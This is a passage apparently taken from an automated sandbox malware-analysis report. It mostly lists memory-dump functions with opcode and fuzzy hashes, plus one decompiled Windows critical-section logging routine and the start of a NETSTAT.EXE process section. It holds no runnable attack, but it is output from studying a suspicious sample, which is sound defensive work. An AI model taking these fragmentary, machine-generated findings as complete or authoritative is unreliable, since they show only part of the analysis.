                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                            • Instruction ID: 11ba3f76acc4ac02ccb61ecd80aea0a6a2ce9d49ccd4c5295adb2eccec5efcb2
                                            • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                            • Instruction Fuzzy Hash: 7BD0C935362981CFD617CB0CC554B0533B4FB44B40FC504A0E600CB762E62CD940CA00
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012535A1, Relevance: .0, Instructions: 12COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                            • Instruction ID: a49832a3176e0ca293e442b79007ff68a0404b080e14e0056c197ab5470706a3
                                            • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                            • Instruction Fuzzy Hash: F8D0A7B143118299DB82EB14E1B47F83772BF0438CF583055890305452C335490DC600
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0122DB40, Relevance: .0, Instructions: 11COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                            • Instruction ID: 6dacedb2c51578c950f30aa7d6ab4285c6a2c92837f0600f412f5bb63dfab623
                                            • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                            • Instruction Fuzzy Hash: DDC08C302A0A42AFEB262F20CD01B103AA0BB10B01F4400A0A700DA0F0EB78D801E600
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012AA537, Relevance: .0, Instructions: 11COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                            • Instruction ID: 00280b65c3b84e81355f7e9cbf777d910a1768409dd0edc9cb232fcc1d86fcad
                                            • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                            • Instruction Fuzzy Hash: 5EC01232190248BBCB266E81CC00F267B2AEBA4B60F008010BA080A5608632E970EA84
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00415845, Relevance: .0, Instructions: 10COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a2439d87bbf9f7676f4df66a02e9cb1c9ea67947406b33dd54738ddd661f2496
                                            • Instruction ID: 61a85b31d0f137e0657e720cf0636b07f7d63fe7f102ea9419dae8980e7c39e8
                                            • Opcode Fuzzy Hash: a2439d87bbf9f7676f4df66a02e9cb1c9ea67947406b33dd54738ddd661f2496
                                            • Instruction Fuzzy Hash: 80A0022FF490144459156C997C440B4D374D0D717AF103677D60CF34005002C016015C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01243A1C, Relevance: .0, Instructions: 10COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                            • Instruction ID: 74c4abff855900c0ef6e7a7464d39b93df9a93850211fddb7354de5e435dc8c0
                                            • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                            • Instruction Fuzzy Hash: 24C04C32190688BBC7167E45DD01F157B69E7A4B60F154021BA040A5618576ED61D598
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0122AD30, Relevance: .0, Instructions: 10COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                            • Instruction ID: db780bf4cbedcd20ccb384449fcd50b30fa19a36fda832d79cd2aaab0eaf465a
                                            • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                            • Instruction Fuzzy Hash: 35C02B330C0248BBC716AF45CD00F117F2DE7A0B60F000020F7040B671CA32EC60D588
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012376E2, Relevance: .0, Instructions: 10COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                            • Instruction ID: c934476e038aae2307825995493448f112e6e4e4e217579a2c787956c48b925d
                                            • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                            • Instruction Fuzzy Hash: A2C08CF01612825FEF2E970CCE30B303A50AB48608F88019CAB02294A3C368A802DA08
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012536CC, Relevance: .0, Instructions: 10COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                            • Instruction ID: 7abfa78bf27dff83ce3b9cfa32e2b3819f1234aaaf4823176d96085323fe60c1
                                            • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                            • Instruction Fuzzy Hash: 17C08C70160480AFD7196B208D40B257294B700A61F6402587220494E0D5289C00E104
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01247D50, Relevance: .0, Instructions: 7COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                            • Instruction ID: 7d3dfe17c52e3c58f835ef3316a847415dd568319f3f648e9ee9e687508fd71c
                                            • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                            • Instruction Fuzzy Hash: 57B09235321941CFCF1ADF28C080B1533E4BB44A40F8400D0E400CBA21D329E8008900
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01252ACB, Relevance: .0, Instructions: 5COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                            • Instruction ID: 8f87f6a7ee7a947fb29959a0206b4f6a4b48235d5b22046e663d50b6cc2980eb
                                            • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                            • Instruction Fuzzy Hash: 35B01232C20441CFCF07EF40C610B297332FF40750F064490900127930C228EC01CB40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269950, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b18c2555fa5cfde37116fbe9fe8feff56a9585b28e08a19d1f5ee872d4f48f1a
                                            • Instruction ID: a31a393154ab6436bedac3b618cc91f1f4cf37e98f3bce91e73a57c73ac8bb39
                                            • Opcode Fuzzy Hash: b18c2555fa5cfde37116fbe9fe8feff56a9585b28e08a19d1f5ee872d4f48f1a
                                            • Instruction Fuzzy Hash: 819002A121140803E14065A948046070005ABD0342F51C015A2055555ECA798C517275
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012699D0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 38ce048092bd6c40c0fd9cc20cfd78ed7dcd1ea07c8ec585f79f123b29b2fd1d
                                            • Instruction ID: b89d5ec44f859ab135e667d4dea60153682599eeaeb8b5054dff529fca0d8576
                                            • Opcode Fuzzy Hash: 38ce048092bd6c40c0fd9cc20cfd78ed7dcd1ea07c8ec585f79f123b29b2fd1d
                                            • Instruction Fuzzy Hash: BC9002A122100442E10461A944047070045ABE1241F51C016A2145554CC5798C616265
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269820, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 889c55a9cf082518db51df67a97747eeb550983ea814953bd037bfc93fff856e
                                            • Instruction ID: 06d7d9c674c50a2ff006f560c51217962720b6e6effa1311340fab8b14a097c1
                                            • Opcode Fuzzy Hash: 889c55a9cf082518db51df67a97747eeb550983ea814953bd037bfc93fff856e
                                            • Instruction Fuzzy Hash: 6090027125100802E14171A944046070009BBD0281F91C016A0415554EC6A58A56BBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0126B040, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 94fe6ea31e263006f45ac647679df32529c66c61c6f1ee37ced45fa29c1e8583
                                            • Instruction ID: ebed59d52cb70c14e4f6fa4d2d47ef3fdd57c0cf2affd93ad4c73703fd2d0d58
                                            • Opcode Fuzzy Hash: 94fe6ea31e263006f45ac647679df32529c66c61c6f1ee37ced45fa29c1e8583
                                            • Instruction Fuzzy Hash: C59002A1611144435540B1A948044075015BBE1341391C125A0445560CC6B88855A3A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012698A0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 37f9c8f6a76979f34bc2f27809e2c4340875b3789438af8057340ee0fd42572d
                                            • Instruction ID: e8a66a3866275283b5c5a2dd81fad8f2028f918cc65b650ae28cd55e2d7e4647
                                            • Opcode Fuzzy Hash: 37f9c8f6a76979f34bc2f27809e2c4340875b3789438af8057340ee0fd42572d
                                            • Instruction Fuzzy Hash: 2490026131100802E10261A944146070009EBD1385F91C016E1415555DC6758953B272
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269B00, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9436d785de6b91c6e07f25a31c44dbf15e01e20517b099b561a237fee441e4aa
                                            • Instruction ID: 2e155d62e425868a1460645a54e0040d2b0de316fe544c5320f27c24cc8e50d0
                                            • Opcode Fuzzy Hash: 9436d785de6b91c6e07f25a31c44dbf15e01e20517b099b561a237fee441e4aa
                                            • Instruction Fuzzy Hash: B190026125100C02E14071A984147070006EBD0641F51C015A0015554DC666896577F1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0126A3B0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d97cd08b367d30182bb42e73d43025c376a26ce669bf24a83481666dbd3dadd7
                                            • Instruction ID: e28642827a43416785a4d8b957a6af02b7f1585ece518beb4faab1e8e8dfc853
                                            • Opcode Fuzzy Hash: d97cd08b367d30182bb42e73d43025c376a26ce669bf24a83481666dbd3dadd7
                                            • Instruction Fuzzy Hash: E990027121144402E14071A9844460B5005BBE0341F51C415E0416554CC6658856A361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269A10, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8476ce7b528ee55d2c3848a2ba379f3b61ffd111065181e8cf93c4ab951838e4
                                            • Instruction ID: d8d68b295620df3a1a6d41a702d9e3d39a5a12114a190f93ea0e5dda0e77fec1
                                            • Opcode Fuzzy Hash: 8476ce7b528ee55d2c3848a2ba379f3b61ffd111065181e8cf93c4ab951838e4
                                            • Instruction Fuzzy Hash: 1D90027121140802E10061A948087470005ABD0342F51C015A5155555EC6B5C8917671
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269A80, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bd1c0f3e61aec9d9548a5172daede7cb4301bc3dbfc8de6a07e09f45007e5d5f
                                            • Instruction ID: 5ceecabb3bab62673639c6e257dfd492f25b8b4645760460312c3fc69020f8b9
                                            • Opcode Fuzzy Hash: bd1c0f3e61aec9d9548a5172daede7cb4301bc3dbfc8de6a07e09f45007e5d5f
                                            • Instruction Fuzzy Hash: FE90026121144842E14062A94804B0F4105ABE1242F91C01DA4147554CC96588556761
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269520, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e13fe5af8952d338d27388a934fe177193a7c96613566e816ec371b7366d8deb
                                            • Instruction ID: 3de06025486e384155907971600c86c1e9d1be7c502490dc50f4ea8d5fca35a4
                                            • Opcode Fuzzy Hash: e13fe5af8952d338d27388a934fe177193a7c96613566e816ec371b7366d8deb
                                            • Instruction Fuzzy Hash: 6A9002E1211144925500A2A98404B0B4505ABE0241B51C01AE1045560CC5758851A275
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0126AD30, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b98315a84ea47f9fc9e1dda5170bc8c2add4a0ea775b6e3f4197b8881bc5498
                                            • Instruction ID: 7d20aa843d60a77bdfea73cc4aec870f842fffb845bb3d7bb07b8e7c3584b116
                                            • Opcode Fuzzy Hash: 1b98315a84ea47f9fc9e1dda5170bc8c2add4a0ea775b6e3f4197b8881bc5498
                                            • Instruction Fuzzy Hash: ED900271A1500412A14071A948146474006BBE0781B55C015A0505554CC9A48A5563E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269560, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aaeb65ac84f3058b8ecb17599aaa70c39ed4d84c3b0d4f2a2284097e47536a14
                                            • Instruction ID: f7d0ba43230185b7b4ba6e3c42cbd426a7ae03fcc500692f1faa388be90ab0df
                                            • Opcode Fuzzy Hash: aaeb65ac84f3058b8ecb17599aaa70c39ed4d84c3b0d4f2a2284097e47536a14
                                            • Instruction Fuzzy Hash: F5900265231004021145A5A9060450B0445BBD6391391C019F1407590CC67188656361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012695F0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3702cc853d76e8865063a73ab573d9eb68453c5cec2a67872d74c9fdd1aafccb
                                            • Instruction ID: 61e33979b81a631d9224d02a604c3fc0b57e65d952445e5494449aba70848585
                                            • Opcode Fuzzy Hash: 3702cc853d76e8865063a73ab573d9eb68453c5cec2a67872d74c9fdd1aafccb
                                            • Instruction Fuzzy Hash: 9A90027121100C02E10461A948046870005ABD0341F51C015A6015655ED6B588917271
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269730, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4341238e34a5b1f6035cbdff40ab8db6368d91b67c5651a4027ffca68db9182d
                                            • Instruction ID: dfc3092a7df226fbb54ea27655022fc935b9d707fa58536773835844ddc7751a
                                            • Opcode Fuzzy Hash: 4341238e34a5b1f6035cbdff40ab8db6368d91b67c5651a4027ffca68db9182d
                                            • Instruction Fuzzy Hash: F990026161500802E14071A954187070015ABD0241F51D015A0015554DC6A98A5577E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0126A710, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1cd227b3f518545608885e9e6d26be77ff6e1ee72a26fb0fb345e2ecc3f9558b
                                            • Instruction ID: b24a10645c4cb9ecb399c53896fcb804d35858fdae5aeebc6cff0fb786b4dc19
                                            • Opcode Fuzzy Hash: 1cd227b3f518545608885e9e6d26be77ff6e1ee72a26fb0fb345e2ecc3f9558b
                                            • Instruction Fuzzy Hash: 0790027131100452A500A6E95804A4B4105ABF0341B51D019A4005554CC5A488616261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269760, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5cb26987f166b0dabd39593faa74dbd53073ae5fc253e7f29e38d7f729c34811
                                            • Instruction ID: ae03cdb2c5708609ffb6a6ed08ff0e0e87dbe11f7caeae4a182706004edd4c1b
                                            • Opcode Fuzzy Hash: 5cb26987f166b0dabd39593faa74dbd53073ae5fc253e7f29e38d7f729c34811
                                            • Instruction Fuzzy Hash: 8E90027121100803E10061A955087070005ABD0241F51D415A0415558DD6A688517261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0126A770, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 339d7c586a39ec42f12256ad024df939a9e1eb824e0cd1dbca0e7dfb015db491
                                            • Instruction ID: f9d967d7cbfba6f7aa5c47d7d96ed2c995f2ccc498c86cd1315f7fa3f03b332e
                                            • Opcode Fuzzy Hash: 339d7c586a39ec42f12256ad024df939a9e1eb824e0cd1dbca0e7dfb015db491
                                            • Instruction Fuzzy Hash: 3C90027521504842E50065A95804A870005ABD0345F51D415A041559CDC6A48861B261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269770, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 762cfd8517e4bc72adc01c378382dbb76b5c7161756380f11e08d7a37acc6e63
                                            • Instruction ID: 3808f3debf70e8c6ed29ea276d01c9abece97a87e625dc1ca2b54c4647c36806
                                            • Opcode Fuzzy Hash: 762cfd8517e4bc72adc01c378382dbb76b5c7161756380f11e08d7a37acc6e63
                                            • Instruction Fuzzy Hash: AF90026121504842E10065A95408A070005ABD0245F51D015A1055595DC6758851B271
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269610, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1e9a07189e32489a85cd5c43d36292439630d7b891d8277d36bc5c97c59787b4
                                            • Instruction ID: 191ff586a0defb436b250658b5f1e3bc0fb4669e64fde3bb9626288f39a890ba
                                            • Opcode Fuzzy Hash: 1e9a07189e32489a85cd5c43d36292439630d7b891d8277d36bc5c97c59787b4
                                            • Instruction Fuzzy Hash: 4390027161500C02E15071A944147470005ABD0341F51C015A0015654DC7A58A5577E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269650, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d30b4452bd36b3c99e698603c427dc4143121dc216fa67a9ef6addfd1b78d968
                                            • Instruction ID: dc6b35d4e85c3e2489d88af9520c7061fa23af9b6420caa33bba72a717640466
                                            • Opcode Fuzzy Hash: d30b4452bd36b3c99e698603c427dc4143121dc216fa67a9ef6addfd1b78d968
                                            • Instruction Fuzzy Hash: FF90027121504C42E14071A94404A470015ABD0345F51C015A0055694DD6758D55B7A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012696D0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ce372514e038d81c33f91635fa1211b389197df5e91443e35a1eb1198f533f60
                                            • Instruction ID: d90b4466c833f240c9e2bb87a7e332b744122facd0e256f83dba661679a246d6
                                            • Opcode Fuzzy Hash: ce372514e038d81c33f91635fa1211b389197df5e91443e35a1eb1198f533f60
                                            • Instruction Fuzzy Hash: 3790027121100C42E10061A94404B470005ABE0341F51C01AA0115654DC665C8517661
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269670, Relevance: .0, Instructions: 2COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: eff0b79daba4bca8b677a82a383d5880162da6497220737180b9e1bf980ef76e
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction Fuzzy Hash:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012BFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 53%
                                            			E012BFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0126CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E012B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E012B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                            0x012bfdda
                                            0x012bfde2
                                            0x012bfde5
                                            0x012bfdec
                                            0x012bfdfa
                                            0x012bfdff
                                            0x012bfe0a
                                            0x012bfe0f
                                            0x012bfe17
                                            0x012bfe1e
                                            0x012bfe19
                                            0x012bfe19
                                            0x012bfe19
                                            0x012bfe20
                                            0x012bfe21
                                            0x012bfe22
                                            0x012bfe25
                                            0x012bfe40

                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012BFDFA
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 012BFE01
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 012BFE2B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                            • API String ID: 885266447-3903918235
                                            • Opcode ID: 5970889015a67ea4e2830e7e454d4ae2f232dfd1630cb59976eed41eae0f8699
                                            • Instruction ID: 82bc671de44cb9ec71a716822d27bd7d7f3a9bafdb4d90ba72a88a97b690631a
                                            • Opcode Fuzzy Hash: 5970889015a67ea4e2830e7e454d4ae2f232dfd1630cb59976eed41eae0f8699
                                            • Instruction Fuzzy Hash: D4F0C232210242BBE6251A45DC42F73BB6AEB55B70F240214F6685A1D1EA62B97097A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Analysis Process: NETSTAT.EXE PID: 4812 Parent PID: 3424 NETSTAT.EXECOMMON

                                            Executed Functions

                                            Function 02FE85C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,02FE3BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02FE3BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02FE860D
                                            Strings
                                            Memory Dump Source
